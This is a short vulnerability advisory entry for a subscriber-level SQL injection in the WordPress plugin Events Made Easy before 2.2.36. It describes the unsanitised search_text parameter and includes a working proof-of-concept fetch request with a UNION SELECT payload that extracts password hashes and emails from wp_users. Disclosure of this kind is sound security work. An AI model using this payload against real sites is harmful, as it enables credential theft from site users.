Lucene search

K
wpexploitKrzysztof ZającWPEX-ID:BC7058B1-CA93-4C45-9CED-7848C7AE4150
HistoryDec 06, 2021 - 12:00 a.m.

Events Made Easy < 2.2.36 - Subscriber+ SQL Injection

2021-12-0600:00:00
Krzysztof Zając
39

0.001 Low

EPSS

Percentile

37.9%

The plugin does not sanitise and escape the search_text parameter before using it in a SQL statement via the eme_searchmail AJAX action, available to any authenticated users. As a result, users with a role as low as subscriber can call it and perform SQL injection attacks

fetch("https://example.com/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": new URLSearchParams({"action":"eme_searchmail","search_text": "') union select 1,1,1,1,1,user_pass,user_email,1,1,1,1,1,1,1,1,1,1,1,1 from wp_users -- g"}),
  "method": "POST",
  "credentials": "include"
})
  .then(response => response.text())
  .then(data => console.log(data));

0.001 Low

EPSS

Percentile

37.9%

Related for WPEX-ID:BC7058B1-CA93-4C45-9CED-7848C7AE4150